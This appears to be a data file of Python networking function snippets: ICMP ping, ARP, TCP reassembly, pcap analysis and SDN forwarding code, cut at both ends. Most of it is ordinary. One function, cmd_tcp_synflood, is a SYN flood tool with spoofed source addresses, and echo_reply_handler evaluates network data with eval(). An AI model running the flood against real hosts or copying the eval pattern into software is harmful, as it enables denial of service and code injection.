0\n\n timeReceived = default_timer() # Essa função retorna o tempo de espera junto com o tempo da CPU e depende da plataforma. \n\n \"\"\"\n Receba dados do soquete. O valor de retorno é um par (bytes, endereço) em que bytes é um objeto de bytes que representa\n os dados recebidos e endereço é o endereço do soquete que envia os dados \n \"\"\"\n recPacket, addr = mySocket.recvfrom(ICMP_MAX_RECV) \n\n \"\"\"\n struct.unpack( fmt , string ) \n Descompacte a sequência (presumivelmente empacotada por ) de acordo com o formato fornecido. \n O resultado é uma tupla, mesmo que contenha exatamente um item.\n \"\"\"\n ipHeader = recPacket[:20]\n iphVersion, iphTypeOfSvc, iphLength, \\\n iphID, iphFlags, iphTTL, iphProtocol, \\\n iphChecksum, iphSrcIP, iphDestIP = struct.unpack(\n \"!BBHHHBBHII\", ipHeader\n )\n\n icmpHeader = recPacket[20:28]\n icmpType, icmpCode, icmpChecksum, \\\n icmpPacketID, icmpSeqNumber = struct.unpack(\n \"!BBHHH\", icmpHeader\n )\n\n if icmpPacketID == myID:\n dataSize = len(recPacket) - 28\n # retorna o tempo de resposta, o tamanho dado, o ping pingado, o numero de seq, id e timeout \n return timeReceived, (dataSize+8), iphSrcIP, icmpSeqNumber, iphTTL\n\n timeLeft = timeLeft - howLongInSelect\n if timeLeft <= 0:\n return None, 0, 0, 0, 0 # retorna nada ", "def echo_reply_handler(self, ev):\n now_timestamp = time.time()\n try:\n latency = now_timestamp - eval(ev.msg.data)\n self.echo_latency[ev.msg.datapath.id] = latency\n except:\n return", "def get_ICMP_echo(payload_size, seq):\r\n icmp_type = 8\r\n icmp_code = 0\r\n init_checksum = 0\r\n icmp_id = random.randint(0, 0xFFFF)\r\n icmp_seq = seq\r\n _checksum = struct.pack(\"!BBHHH\", icmp_type, icmp_code, init_checksum,\r\n icmp_id, icmp_seq)\r\n\r\n payload = \"\"\r\n for i in range(payload_size):\r\n payload += 'a'\r\n payload = bytes(payload, 'utf-8')\r\n\r\n icmp_checksum = get_checksum(_checksum + payload)\r\n\r\n header = struct.pack(\"!BBHHH\", icmp_type, icmp_code, icmp_checksum,\r\n icmp_id, icmp_seq)\r\n\r\n return header + payload", "def _arp_send(dp, port_out, arp_code, ip_sender, ip_target, eth_dst='ff:ff:ff:ff:ff:ff',eth_src=None,eth_target='00:00:00:00:00:00'):\n\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n pkt = packet.Packet()\n\n # HACK: to reply as real interface on virtual machine\n if dp.id in LAN_TYPE_FORWARDERS and dp.id == 0xa:\n eth_src = \"08:00:27:e1:e4:83\"\n elif dp.id in LAN_TYPE_FORWARDERS and dp.id == 0xc:\n eth_src = \"08:00:27:52:fb:7d\"\n\n ##If no src_mac was provided we generate one from Datapath ID of forwarder that recieved message\n ##If Datapath ID starts with zeros we cannot use it as legit MAC address\n ##Second hex digit must be 2 to indicate localy administered non-multicast address\n if eth_src == None:\n str_hex_dpid = str(hex(dp.id)).rstrip('L').lstrip('0x')\n if len(str_hex_dpid) < 11:\n eth_src ='02'\n for i in range(10-len(str_hex_dpid)):\n eth_src += '0'\n eth_src += str_hex_dpid\n else:\n eth_src = dp.id\n\n eth = ethernet.ethernet(eth_dst, eth_src, ether.ETH_TYPE_ARP)\n arp_req = arp.arp_ip(arp_code, eth_src, ip_sender, eth_target, ip_target)\n\n pkt = packet.Packet()\n pkt.add_protocol(eth)\n pkt.add_protocol(arp_req)\n pkt.serialize()\n actions=[parser.OFPActionOutput(port_out)]\n out=parser.OFPPacketOut(datapath=dp, buffer_id=ofp.OFP_NO_BUFFER, in_port=ofp.OFPP_CONTROLLER, actions=actions, data=pkt.data)\n dp.send_msg(out)", "def send_error(self, conn, msg, srcif):\n message = {}\n message[SRCE], message[DEST] = ('.').join(srcif.split('.', 3)[:3]) + '.1', msg[SRCE]\n message[TYPE] = NRTE\n message[MESG] = {}\n sending_msg = json.dumps(message).encode()\n conn.sendall(sending_msg)\n return True", "def _tcp_reassemble(self, number, src_addr, dst_addr, tcp):\n \n pld = tcp.message[tcp.header_len : tcp.header_len + tcp.segement_len]\n src_socket = (src_addr, tcp.src_port)\n dst_socket = (dst_addr, tcp.dst_port)\n sockets = (src_socket, dst_socket)\n\n def debug_cond(tcp):\n return False\n return True\n return tcp.stream_index == 710\n\n #check the other side of the tcp connection, flush the complete pdu to the msg_list\n if sockets in _tcp_buf and tcp.ack_num != _tcp_buf[sockets].ack: \n self._tcp_flush(sockets)\n del _tcp_buf[sockets]\n if debug_cond(tcp):\n print \"get a new http, decide by %d\" % number\n\n if debug_cond(tcp):\n print \"_tcp_reassemble, number= %d, sequence_num=%d, ack = %d, pldlen=%d, msglen=%d, opt_paddings=%d, iptotal_len=%d, ipheader_len=%d, tcpheader_len=%d\" % (number, tcp.ack_num, len(pld), len(tcp.message), len(tcp.opt_paddings), tcp.ip.total_len, tcp.ip.header_len, tcp.header_len)\n pass\n\n if pld:\n if not sockets in _tcp_buf:\n if debug_cond(tcp):\n print \" add a new message, begin with %d\" % number\n _tcp_buf[sockets] = Message({\n 'pcap_num_list': [],\n 'ts': self.packet_headers[number]['ts'] - self._ts_base,\n 'ip_proto': 'TCP',\n 'src_addr': src_addr,\n 'dst_addr': dst_addr,\n 'src_port': tcp.src_port,\n 'dst_port': tcp.dst_port,\n #'seq': tcp.sequence_num, HUA tcp disorder will generate error\n 'tcp_list': [],\n 'seq_min': 0,\n 'ack': tcp.ack_num,\n 'payload': [],\n 'stream_index': tcp.stream_index, # HUA add a stream index to message\n 'direction': tcp.direction, # HUA add to determin the http is request or response\n 'flag': False\n })\n try:\n _tcp_buf[sockets].ts = self.packet_headers[number]['ts'] - self._ts_base # HUA we should update ts and set it to last\n except:\n print number\n print len(self.packet_headers)\n _tcp_buf[sockets].pcap_num_list.append(number)\n if number == 2246:\n _tcp_buf[sockets].flag = False\n _tcp_buf[sockets].tcp_list.append(tcp)\n #offset = tcp.sequence_num - _tcp_buf[sockets].seq # seq 是相对的\n #_tcp_buf[sockets].payload[offset:offset+len(pld)] = list(pld)", "def shortest_forwarding(self, msg, eth_type, ip_src, ip_dst):\r\n\r\n pkt = packet.Packet(msg.data)\r\n icmp_pkt = pkt.get_protocol(icmp.icmp)\r\n if icmp_pkt:\r\n ip_protocol = 1\r\n print 'icmp processing!'\r\n self.icmp_forwarding(msg, ip_protocol, eth_type, ip_src, ip_dst)\r\n return\r\n datapath = msg.datapath\r\n in_port = msg.match['in_port']\r\n tcp_pkt = None\r\n udp_pkt = None\r\n dst_port = self.awareness.get_host_location(ip_dst)[1]\r\n tcp_pkt = pkt.get_protocol(tcp.tcp)\r\n udp_pkt = pkt.get_protocol(udp.udp)\r\n L4_port = None\r\n flow_info = None\r\n flow_info_reverse = None\r\n\r\n # if not icmp packet,Get ip_proto and L4 port number.\r\n result = self.get_sw(datapath.id, in_port, ip_src, ip_dst) # result = (src_sw, dst_sw)\r\n if (result):\r\n src_sw, dst_sw = result[0], result[1]\r\n if setting.enable_Flow_Entry_L4Port:\r\n ip_proto, L4_port, Flag = self.get_L4_info(tcp_pkt, udp_pkt)\r\n if result:\r\n if dst_sw:\r\n src_sw, dst_sw = result[0], result[1]\r\n if ip_proto and L4_port and Flag:\r\n if ip_proto == 6:\r\n L4_Proto = 'TCP'\r\n elif ip_proto == 17:\r\n L4_Proto = 'UDP'\r\n else:\r\n pass\r\n L4_port.reverse()\r\n flow_info = (eth_type, ip_src, ip_dst, in_port, ip_proto, Flag, L4_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port, ip_proto, Flag, L4_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n info = (ip_src, ip_dst, ip_proto, L4_port[0], L4_port[1])\r\n info2 = (ip_dst, ip_src, ip_proto, L4_port[1], L4_port[0])\r\n if (info in self.register) and (info2 in self.register):\r\n return\r\n self.register.append(info)\r\n self.register.append(info2)\r\n # dst_host and src_host link one same switch\r\n if self.newComingFlows['src'].has_key(ip_src):\r\n self.newComingFlows['src'][ip_src] += 1\r\n else:\r\n self.newComingFlows['src'][ip_src] = 1\r\n if self.newComingFlows['dst'].has_key(ip_dst):\r\n self.newComingFlows['dst'][ip_dst] += 1\r\n else:\r\n self.newComingFlows['dst'][ip_dst] = 1\r\n flowDemand = self._bandwidth_demand(ip_src, ip_dst)\r\n if src_sw == dst_sw:\r\n self.send_packet_out(datapath, msg.buffer_id, in_port, dst_port, msg.data)\r\n else:\r\n if not (str(src_sw).startswith('3') and str(dst_sw).startswith('3')):\r\n return\r\n paths = self.awareness.shortest_paths.get(src_sw).get(dst_sw)\r\n self.graph = self.monitor.graph\r\n path = self._select_paths1(flowDemand, paths)\r\n\r\n # path = self.get_path(src_sw, dst_sw, weight=self.weight)\r\n # Path has already been calculated, just get it.\r\n if path == None:\r\n return\r\n path.reverse()\r\n try:\r\n # bucket=self.swToSegments(path)\r\n # self.Segment_forwarding(flow_info,bucket)\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info_reverse, msg.buffer_id,\r\n ip_dst, ip_src, msg.data)\r\n path.reverse()\r\n if len(flow_info_reverse) == 7:\r\n L4_port.reverse()\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info, msg.buffer_id, ip_src,\r\n ip_dst, msg.data)\r\n # self.compute_runing_time()\r\n\r\n except:\r\n self.flood(msg)", "def tcpdump(timeout, q, interface):\t\n\tlogging.debug('tcpdump -s 1024 -lqnAt tcp port 80 -i eth0')\n\t# tcpdump -s 1024 -lqnAt tcp port 80\n\t\t\n\tcommand = Command(['/usr/sbin/tcpdump', '-s 1024', '-lnAq', '-i', interface], timeout)\n\tcommand.run()\n\n\t# when it's executing here, the results have been available\n\t# print command.out\n\n\tif command.out is not None:\n\t\t# pattern = \"time=([0-9]+\\.[0-9]+) ms\"\n\t\tip_pattern = \"IP ([0-9]+.[0-9]+.[0-9]+.[0-9]+).[0-9]+ > [0-9]+.[0-9]+.[0-9]+.[0-9]+.[0-9]\"\n\t\tgoogle_pattern = \"domain=.google.com\"\n\t\tlines = command.out.split('\\n')\n\t\tlast_ip = None\n\n\t\t# first time scan for google's return ip\n\t\tfor line in lines:\n\t\t\tip_src = re.search(ip_pattern, line)\n\t\t\tif ip_src is not None:\n\t\t\t\tlast_ip = ip_src.group(1)\n\t\t\tif re.search(google_pattern, line):\n\t\t\t\tprint last_ip\n\t\t\t\tbreak\n\n\t\tgEntries = []\n\t\tif last_ip is not None:\n\t\t\t\n\t\t\t# second time scan parse tcpdump for query entries\n\t\t\tfor line in lines:\n\t\t\t\tlast_ip_pos = re.search(last_ip, line)\n\t\t\t\tif last_ip_pos is None:\n\t\t\t\t\tcontinue\n\t\t\t\n\t\t\t\tif line.index('>') > last_ip_pos.start():\n\t\t\t\t\t# from remote to this place\n\t\t\t\t\ttraffic_type = 1\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# out to remote\n\t\t\t\t\ttraffic_type = 0\n\t\t\t\n\t\t\t\ttime_pattern = \"([0-9]+:[0-9]+:[0-9]+.[0-9]+) IP\"\n\t\t\t\ttimestamp = re.search(time_pattern, line)\n\t\t\t\tif timestamp is not None:\n\t\t\t\t\ttime_str = timestamp.group(1)\n\t\t\t\t\th, m, s, ms = map(int, re.split(r'[.:]+', time_str))\n\t\t\t\t\ttimestamp_delta = timedelta(hours=h, minutes=m, seconds=s, microseconds=ms)\n\t\t\t\t\tgEntries.append( (timestamp_delta, traffic_type) )\n\t\t\t\telse:\n\t\t\t\t\tgEntries.append( (None, -1))\n\n\t\tq.put((command.returncode, last_ip, gEntries))\n\t\treturn", "def writer(self):\n #while self.alive:\n try:\n icmpreq = ethernet.Ethernet(src_s=\"dc:a6:32:00:a7:8b\", dst_s=\"ec:84:b4:3e:c8:20\", type=ethernet.ETH_TYPE_IP) +\\\n ip.IP(p=ip.IP_PROTO_ICMP, src_s=\"192.168.1.35\", dst_s=\"172.217.166.110\") +\\\n icmp.ICMP(type=8) +\\\n icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b\"12345678901234567890\")\n self.serial.write(icmpreq.bin()+b'~')\n except socket.error as msg:\n print(msg)\n self.stop()", "def receive_one_ping(my_socket, id, timeout):\n time_left = timeout\n while True:\n started_select = time.time()\n what_ready = select.select([my_socket], [], [], time_left)\n how_long_in_select = (time.time() - started_select)\n if what_ready[0] == []: # Timeout\n return\n\n time_received = time.time()\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20:28]\n icmp_type, code, checksum, packet_id, sequence = struct.unpack(\n \"bbHHh\", icmp_header\n )\n # Filters out the echo request itself. \n # This can be tested by pinging 127.0.0.1 \n # You'll see your own request\n if icmp_type != 8 and packet_id == id:\n bytes_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28:28 + bytes_in_double])[0]\n return time_received - time_sent\n\n time_left = time_left - how_long_in_select\n if time_left <= 0:\n return", "def sniff_online(args):\n print('viewer: listening on ' + args.interface)\n\n try:\n sniffer = pcapy.open_live(args.interface, 65536, 1, 1)\n sniffer.setfilter('icmp')\n except Exception as e:\n print(e)\n sys.exit(-1)\n\n if not args.count:\n count = True\n else:\n count = args.count\n\n while count:\n (header, packet) = sniffer.next()\n if header:\n tts = header.getts()\n ret = parse_ICMP_Echo(tts[0] + tts[1] / 1000000, packet)\n\n if ret and args.count:\n count -= 1", "def ping(msg):\n msg = msg[0:1] + 'O' + msg[2:]\n ircsocket.send(bytes(msg, 'utf-8'))\n sendmsg('This message should be eaten by irc. QQ.')", "def create_icmp_server_socket():\n sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n sock.bind((\"0.0.0.0\", 0))\n sock.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)\n return sock", "def ship_tnm(tnu, tnm):\n user_string = \"{user} ({host}:{port})\".format(user=tnu.name, host=tnu.host, port=str(tnu.port))\n sender = socket.socket()\n sender.settimeout(1)\n try:\n sender.connect((tnu.host, tnu.port))\n sender.send(tnm.ciphertext)\n sender.shutdown(socket.SHUT_RDWR)\n except (socket.error, socket.timeout) as e:\n # Commented out to save it for the message queue later.\n # print(\"Unable to reach {user}: {reason}\".format(user=user_string, reason=str(e)))\n if tnm.ciphertext:\n # Only log for real messages, not status checks\n logger.error(\"Failed to send a message to {user}: {reason}\".format(user=user_string, reason=str(e)))\n sender.close()\n return False\n else:\n if tnm.ciphertext:\n logger.info(\"Sent a message to {user}.\".format(user=user_string))\n filesystem.write_message(tnu.name, tnm)\n sender.close()\n return True", "def ping_once(sock, data_size=None, id=None):\n\n if data_size is None:\n data_size = 64\n \n if id is None:\n id = 1\n \n seq = 1999 # not really used here, but the TV show Space 1999! was pretty awesome when I was a kid.\n\n payload, packet = create_packet(id, seq, data_size)\n\n try:\n # Send it, record the time.\n sock.sendall(packet)\n time_send = now()\n\n # Receive response, record time.\n msg_recv = sock.recv(0xffff)\n time_recv = now()\n\n # Extract packet data.\n ip = dpkt.ip.IP(msg_recv)\n\n # Process results.\n is_same_data = (payload == ip.icmp.echo.data)\n time_ping = (time_recv - time_send)\n echo_id = ip.icmp.echo.id\n\n except socket.timeout:\n is_same_data = False\n time_ping = None\n echo_id = None\n\n # Done.\n result = {'time_ping':time_ping,\n 'data_size':data_size,\n 'timeout':sock.gettimeout()*1000., # convert from seconds to milliseconds\n 'is_same_data':is_same_data,\n 'id':id,\n 'echo_id':echo_id}\n\n return result", "def compute_tcp_acks_retrans(pcap_filepath, connections, inverse_conns, ts_syn_timeout=6.0, ts_timeout=3600.0):\n print(\"Computing TCP ack sizes for\", pcap_filepath)\n nb_acks = {co.C2S: {}, co.S2C: {}}\n acks = {}\n # Avoid processing packets that do not belong to any analyzed TCP connection\n black_list = set()\n pcap_file = open(pcap_filepath)\n pcap = dpkt.pcap.Reader(pcap_file)\n count = 0\n try:\n for ts, buf in pcap:\n ts_delta = get_ts_delta(ts)\n count += 1\n if count % 100000 == 0:\n print(count)\n # Check if linux cooked capture\n if pcap.datalink() == dpkt.pcap.DLT_LINUX_SLL:\n eth = dpkt.sll.SLL(buf)\n else:\n eth = dpkt.ethernet.Ethernet(buf)\n if type(eth.data) == dpkt.ip.IP or type(eth.data) == dpkt.ip6.IP6:\n ip = eth.data\n if type(ip.data) == dpkt.tcp.TCP:\n tcp = ip.data\n fin_flag = (tcp.flags & dpkt.tcp.TH_FIN) != 0\n syn_flag = (tcp.flags & dpkt.tcp.TH_SYN) != 0\n rst_flag = (tcp.flags & dpkt.tcp.TH_RST) != 0\n ack_flag = (tcp.flags & dpkt.tcp.TH_ACK) != 0\n\n saddr, daddr, sport, dport = get_ips_and_ports(eth, ip, tcp)\n if syn_flag and not ack_flag and not fin_flag and not rst_flag:\n process_first_syn(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, black_list, inverse_conns,\n ts_syn_timeout, ts_timeout)\n\n elif (saddr, sport, daddr, dport) in black_list:\n continue\n\n elif syn_flag and ack_flag and not fin_flag and not rst_flag:\n process_syn_ack(ts_delta, acks, nb_acks, connections, tcp, saddr, ip, daddr, sport, dport, black_list, inverse_conns,\n ts_syn_timeout, ts_timeout)\n\n elif not syn_flag and not rst_flag and ack_flag:\n if (saddr, sport, daddr, dport) in acks:\n process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag)\n\n elif (daddr, dport, saddr, sport) in acks:\n process_pkt_from_server(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag)\n else:\n # Silently ignore those packets\n # print(saddr, sport, daddr, dport, \"haven't seen beginning...\")\n continue\n\n except dpkt.NeedData as e:\n print(e, \": trying to continue...\", file=sys.stderr)\n finally:\n pcap_file.close()\n\n return nb_acks", "def cmd_tcp_synflood(ip, interface, count, port, forgemac, forgeip, verbose):\n\n conf.verb = False\n\n if interface:\n conf.iface = interface\n\n layer2 = Ether()\n\n layer3 = IP()\n layer3.dst = ip\n\n layer4 = TCP()\n layer4.dport = port\n\n pkt = layer2 / layer3 / layer4\n\n counter = 0\n\n print(\"Please, remember to block your RST responses\", file=sys.stderr)\n\n while True:\n if forgeip:\n pkt[IP].src = \"%s.%s\" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))\n if forgemac:\n pkt[Ether].src = RandMAC()\n\n pkt[TCP].sport = randint(10000, 65000)\n\n if verbose:\n print(pkt.summary())\n else:\n print('.', end='')\n sys.stdout.flush()\n\n sendp(pkt)\n counter += 1\n\n if count != 0 and counter == count:\n break\n\n return True", "def test_notice_replier_should_have_saved_request_ip_mac(arp):\n\n # Sender of this reply should have saved the src MAC and src IP of the request\n e = Ether(src='00:11:22:aa:bb:cd', dst='00:11:22:aa:bb:ca')\n a = ARP(hwsrc='00:11:22:aa:bb:cd', hwdst='00:11:22:aa:bb:ca', psrc='10.0.0.1', pdst='10.0.0.2', op='is-at')\n response = arp.receive_packet(e / a)\n assert type(response) is PermittedResponse\n\n # Sender of previous reply should not do a new request\n e = Ether(src='00:11:22:aa:bb:cd', dst='ff:ff:ff:ff:ff:ff')\n a = ARP(hwsrc='00:11:22:aa:bb:cd', hwdst='00:00:00:00:00:00', psrc='10.0.0.1', pdst='10.0.0.2', op='who-has')\n arp.receive_packet(e / a)\n response = arp.receive_packet(e / a)\n\n assert type(response) is NoticeRespone", "def gtp_packets(\n self, type='fdir', tunnel_pkt='gtpu', inner_L3='ipv4',\n match_opt='matched', chk='', teid=0xF):\n pkts = []\n pkts_gtpc_pay = {'IPV4/GTPC': 'Ether()/IP()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPC': 'Ether()/IPv6()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_pay = {'IPV4/GTPU': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv4 = {'IPV4/GTPU/IPV4': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv6 = {'IPV4/GTPU/IPV6/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n if match_opt == 'matched':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = pkts_gtpc_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = pkts_gtpu_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = pkts_gtpu_ipv4\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = pkts_gtpu_ipv6\n\n if match_opt == 'not matched':\n if type is 'fdir':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items())\n if type is 'clfter':\n if tunnel_pkt is 'gtpc':\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu':\n pkts = pkts_gtpc_pay\n return pkts", "def icmp_ping(ip_addr, timeout = 6, count = 1024):\n for i in range(count):\n print('Ping wait:')\n try:\n delay = ping_wait(ip_addr, timeout)\n except socket.gaierror as e:\n print('Failed. (socket error: %s)' % e[1])\n break\n\n if delay == None:\n print('Failed. (timeout within %s second.)' % timeout)\n else:\n print('get ICMP in %0.4f ms' % (delay * 1000))", "def traff_from_extgwrtr(extgwrtr_ip, fipsOftargetVMs, proto='all', jumbo=0):\n traff = gbpFabTraff()\n print 'FIPs of Target VMs == %s' % (fipsOftargetVMs)\n # List of FIPs ExtGWRtr will ping, ping_fips should be type List\n if isinstance(fipsOftargetVMs,dict):\n ping_fips = fipsOftargetVMs.values() \n if isinstance(fipsOftargetVMs,list):\n ping_fips = fipsOftargetVMs\n if not isinstance(fipsOftargetVMs,list):\n ping_fips = [fipsOftargetVMs]\n attemptall = 1\n if proto == 'all':\n while attemptall < max_traff_attempts:\n if jumbo == 1:\n results_icmp = traff.test_regular_icmp(\n extgwrtr_ip, ping_fips, pkt_size='9000')\n else:\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n if results_icmp != 1 and results_tcp != 1:\n retval = {'ICMP': results_icmp.keys(), 'TCP': results_tcp.keys()}\n elif results_icmp != 1:\n retval = {'ICMP': results_icmp.keys()}\n elif results_tcp != 1:\n retval = {'TCP': results_tcp.keys()}\n else:\n return 1\n if isinstance(retval,dict):\n print \"Wait for 10 secs before the next ICMP & TCP retry\\n\"\n sleep(10)\n attemptall += 1\n return retval\n if proto == 'icmp':\n if jumbo == 1:\n results_icmp = traff.test_regular_icmp(\n extgwrtr_ip, ping_fips, pkt_size='9000')\n else:\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n attempt = 1\n while attempt < max_traff_attempts:\n if isinstance(results_icmp, dict):\n print \"Wait for 10 secs before the next ICMP retry\\n\"\n sleep(10)\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n attempt += 1\n else:\n break\n if attempt == max_traff_attempts:\n return {'ICMP': results_icmp.keys()}\n if proto == 'tcp':\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n retry = 1\n while retry < max_traff_attempts:\n if isinstance(results_tcp, dict):\n print \"Wait for 10 secs before the next TCP retry\\n\"\n sleep(10)\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n retry += 1\n else:\n break\n if retry == max_traff_attempts:\n return {'TCP': results_tcp.keys()}", "def print_ofpt_echo_reply(msg):\n if len(msg.data.value) > 0:\n hexdump(msg.data.value)", "def sniff(self, func=None, timeout=None):\n msg = None\n while True:\n msg = self.shell.client.get_stream_packet(type_=\"packet\", timeout=timeout)\n if func is not None:\n func(msg)\n else:\n break\n return msg", "def sendpkt(self, data, retries=10): \n wire_data = self.pack(data).encode()\n self.logger.debug('sending> %s', data) \n self.s.send(wire_data)\n res = self.rxqueue.get()\n while res != '+':\n self.s.send(wire_data)\n res = self.rxqueue.get()\n retries -= 1\n if retries == 0:\n raise ValueError(\"retry fail\")", "def send_ping(my_socket, ip_addr, ID):\n ip = socket.gethostbyname(ip_addr)\n\n # Header is type (8), code (8), checksum (16), id 